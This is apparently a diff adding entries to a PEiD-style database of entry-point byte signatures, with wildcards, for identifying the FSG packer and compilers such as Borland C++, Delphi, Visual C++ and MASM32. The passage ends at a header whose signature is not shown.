+signature = EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> (Watcom C/C++ EXE)]
+signature = EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MS Visual C++ / Borland C++ / Watcom C++)]
+signature = EB 02 CD 20
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi 4.0 - 5.0)]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 46 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 7.0)]
+signature = EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C# / Basic .NET)]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B3
+ep_only = true
+
+[FSG 1.31 -> dulek/xt]
+signature = BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? F6
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 01 ?? EB 02 ?? ?? ?? 80 ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = E8 01 00 00 00 ?? ?? E8 ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = EB 02 ?? ?? EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt]
+signature = ?? ?? EB ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE
+ep_only = true
+
+[Microsoft Visual C# / Basic .NET]
+signature = FF 25 00 20 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[MASM32]
+signature = 6A ?? 68 00 30 40 00 68 ?? 30 40 00 6A 00 E8 07 00 00 00 6A 00 E8 06 00 00 00 FF 25 08 20
+ep_only = true
+
+[Video-Lan-Client]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF
+ep_only = true
+
+[Exact Audio Copy]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE EB 02 CD 20 57 EB 02 CD 20 5A 88 10 EB 02 CD 20 40 E8 02 00 00 00 C5 62 5A 4E E8 01 00 00 00 43 5A 2B DB 3B F3 75 B1 C1 F3 0D 92 B8 DC 0C 4E 0D B7 F7 0A 39 F4 B5 ?? ?? 36 FF 45 D9 FA FB FE FD FE CD 6B FE 82 0D 28 F3 B6 A6 A0 71 1F BA 92 9C EE DA FE 0D 47 DB 09 AE DF E3 F6 50 E4 12 9E C8 EC FB 4D EA 77 C9 03 75 E0 D2 D6 E5 E2 8B 41 B6 41 FA 70 B0 A0 AB F9 B5 C0 BF ED 78 25 CB 96 E5 A8 A7 AA A0 DC 5F 73 9D 14 F0 B5 6A 87 B7 3B E5 6D 77 B2 45 8C B9 96 95 A0 DC A2 1E 9C 9B 11 93 08 83 9B F8 9E 0A 8E 10 F7 85
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F
+ep_only = true
+
+[Microsoft (R) Incremental Linker Version 5.12.8078 (MASM/TASM)->WinASM Studio]
+signature=6A 00 68 00 30 40 00 68 1E 30 40 00 6A 00 E8 0D 00 00 00 6A 00 E8 00 00 00 00 FF 25 00 20 40 00 FF 25 08 20 40
+ep_only = true
+
+[Borland Pascal v7.0 for Windows]
+signature = 9A FF FF 00 00 9A FF FF 00 00 55 89 E5 31 C0 9A FF FF 00 00
+ep_only = true
+
+[Borland C++ for Win32 1994]
+signature = A1 ?? ?? ?? ?? C1 ?? ?? A3 ?? ?? ?? ?? 83 ?? ?? ?? ?? 75 ?? 57 51 33 C0 BF
+ep_only = true
+
+[Borland C++ for Win32 1995]
+signature = A1 ?? ?? ?? ?? C1 ?? ?? A3 ?? ?? ?? ?? 57 51 33 C0 BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B CF 76
+ep_only = true
+
+[Borland C++ for Win32 1995]
+signature = A1 ?? ?? ?? ?? C1 ?? ?? A3 ?? ?? ?? ?? 83 ?? ?? ?? ?? 75 ?? 80 ?? ?? ?? ?? ?? ?? 74
+ep_only = true
+
+[Borland C++ for Win32 1999]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? C1 E0 02 A3 ?? ?? ?? ?? 52
+ep_only = true
+
+[Borland C++ for Win32 1999]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90
+ep_only = true
+
+[Borland C++]
+signature = A1 ?? ?? ?? ?? C1 E0 02 A3 ?? ?? ?? ?? 57 51 33 C0 BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B CF 76 05 2B CF FC F3 AA 59 5F
+ep_only = true
+
+[Borland C++ DLL]
+signature = A1 ?? ?? ?? ?? C1 E0 02 A3
+ep_only = true
+
+[Borland C++ DLL]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9
+ep_only = true
+
+[Borland C++ DLL]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 A1 C1 E0 02 A3 8B
+ep_only = true
+
+[Borland C++ DLL]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? C1 E0 02 A3 ?? ?? ?? ?? 8B
+ep_only = true
+
+[Borland Delphi vx.x (Component)]
+signature = C3 E9 ?? ?? ?? FF 8D 40
+ep_only = true
+
+[Borland Delphi DLL]
+signature = 55 8B EC 83 C4 B4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 40
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = 55 8B EC 83 C4 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Borland Delphi v2.0]
+signature = E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 0A ?? ?? ?? B8 ?? ?? ?? ?? C3
+ep_only = true
+
+[Borland Delphi v3.0]
+signature = 50 6A ?? E8 ?? ?? FF FF BA ?? ?? ?? ?? 52 89 05 ?? ?? ?? ?? 89 42 04 E8 ?? ?? ?? ?? 5A 58 E8 ?? ?? ?? ?? C3 55 8B EC 33 C0
+ep_only = true
+
+[Borland Delphi v3.0]
+signature = 55 8B EC 83 C4 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Borland Delphi v4.0 - v5.0]
+signature = 50 6A ?? E8 ?? ?? FF FF BA ?? ?? ?? ?? 52 89 05 ?? ?? ?? ?? 89 42 04 C7 42 08 ?? ?? ?? ?? C7 42 0C ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 58 E8 ?? ?? ?? ?? C3
+ep_only = true
+
+[Borland Delphi v4.0 - v5.0]
+signature = 55 8B EC 83 C4 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20
+ep_only = true
+
+[Borland Delphi v4.0 - v5.0]
+signature = 50 6A 00 E8 ?? ?? FF FF BA ?? ?? ?? ?? 52 89 05 ?? ?? ?? ?? 89 42 04 C7 42 08 00 00 00 00 C7 42 0C 00 00 00 00 E8 ?? ?? ?? ?? 5A 58 E8 ?? ?? ?? ?? C3
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = BA ?? ?? ?? ?? 83 7D 0C 01 75 ?? 50 52 C6 05 ?? ?? ?? ?? ?? 8B 4D 08 89 0D ?? ?? ?? ?? 89 4A 04
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = 53 8B D8 33 C0 A3 00 ?? ?? ?? 06 A0 0E 80 ?? ?? 0F FA 30 ?? ?? ?? 0A 10 ?? ?? ?? 0A 30 ?? ?? ?? 03 3C 0A 30 ?? ?? ?? 03 3C 0A 30 ?? ?? ?? E8
+ep_only = true
+
+[Borland Delphi v6.0 - v7.0]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 ?? ?? FB FF A1 ?? ?? ?? ?? 8B ?? E8 ?? ?? FF FF 8B 0D ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 8B 15 ?? ?? ?? ?? E8 ?? ?? FF FF A1 ?? ?? ?? ?? 8B ?? E8 ?? ?? FF FF E8 ?? ?? FB FF 8D 40
+ep_only = true
+
+[Borland Delphi v5.0 KOL/MCK]
+signature = 55 8B EC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? 00 00 00
+ep_only = true
+
+[Borland Delphi v5.0 KOL]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? 40 00 E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF 8B C0 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Borland Delphi v6.0]
+signature = 53 8B D8 33 C0 A3 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? FF A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? E8
+ep_only = true
+
+[Borland Delphi v6.0]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? 45 00 E8 ?? ?? ?? FF A1 ?? ?? 45 00 8B 00 E8 ?? ?? FF FF 8B 0D
+ep_only = true
+
+[Borland Delphi v6.0 KOL]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? 40 00 E8 ?? ?? FF FF A1 ?? 72 40 00 33 D2 E8 ?? ?? FF FF A1 ?? 72 40 00 8B 00 83 C0 14 E8 ?? ?? FF FF E8 ?? ?? FF FF
+ep_only = true
+
+[Borland Delphi Setup Module]
+signature = 55 8B EC 83 C4 ?? 53 56 57 33 C0 89 45 F0 89 45 D4 89 45 D0 E8
+ep_only = true
+
+[Borland Delphi]
+signature = 55 8B EC 83 C4 F4
+ep_only = true
+
+[Borland Delphi (Component)]
+signature = C3 E9 ?? ?? ?? FF 8D 40
+ep_only = true
+
+[Cygwin32]
+signature = 55 89 E5 83 EC 04 83 3D
+ep_only = true
+
+[FASM v1.3x]
+signature = 6A ?? FF 15 ?? ?? ?? ?? A3
+ep_only = true
+
+[Free Pascal v0.99.10]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 00 6E 00 00 55 89 E5 8B 7D 0C 8B 75 08 89 F8 8B 5D 10 29
+ep_only = true
+
+[LCC Win32 v1.x]
+signature = 64 A1 ?? ?? ?? ?? 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 ?? 50
+ep_only = true
+
+[LCC Win32 DLL]
+signature = 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 ?? ?? ?? FF 75 10 FF 75 0C FF 75 08 A1
+ep_only = true
+
+[Microsoft Visual C++]
+signature = 8B 44 24 08 56 83 E8 ?? 74 ?? 48 75
+ep_only = true
+
+[Microsoft Visual C++]
+signature = 8B 44 24 08 83 ?? ?? 74
+ep_only = true
+
+[Microsoft Visual C v2.0]
+signature = 53 56 57 BB ?? ?? ?? ?? 8B ?? ?? ?? 55 3B FB 75
+ep_only = true
+
+[Microsoft Visual C++ vx.x]
+signature = 55 8B EC 56 57 BF ?? ?? ?? ?? 8B ?? ?? 3B F7 0F
+ep_only = true
+
+[Microsoft Visual C++ vx.x]
+signature = 53 55 56 8B ?? ?? ?? 85 F6 57 B8 ?? ?? ?? ?? 75 ?? 8B ?? ?? ?? ?? ?? 85 C9 75 ?? 33 C0 5F 5E 5D 5B C2
+ep_only = true
+
+[Microsoft Visual C++ v4.x]
+signature = 64 A1 00 00 00 00 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 64 89 25 00 00 00 00 83 EC ?? 53 56 57
+ep_only = true
+
+[Microsoft Visual C++ v4.2]
+signature = 64 A1 00 00 00 00 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 64 ?? ?? ?? ?? ?? ?? 83 ?? ?? 53 56 57 89 ?? ?? FF
+ep_only = true
+
+[Microsoft Visual C++ v4.2]
+signature = 64 A1 00 00 00 00 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 64 ?? ?? ?? ?? ?? ?? 83 ?? ?? 53 56 57 89 ?? ?? C7
+ep_only = true
+
+[Microsoft Visual C++ v4.2 DLL]
+signature = 53 B8 ?? ?? ?? ?? 8B ?? ?? ?? 56 57 85 DB 55 75
+ep_only = true
+
+[Microsoft Visual C++ v5.0]
+signature = 55 8B EC 6A FF 68 68 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 53 56 57
+ep_only = true
+
+[Microsoft Visual C++ v5.0 DLL]
+signature =  ?? ?? 24 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 8B ?? 24 0C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D
+ep_only = true
+
+[Microsoft Visual C++ v5.0/v6.0 (MFC)]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50
+ep_only = true
+
+[Microsoft Visual C++ vx.x]
+signature = 55 8B EC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? 83 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Microsoft Visual C++ vx.x DLL]
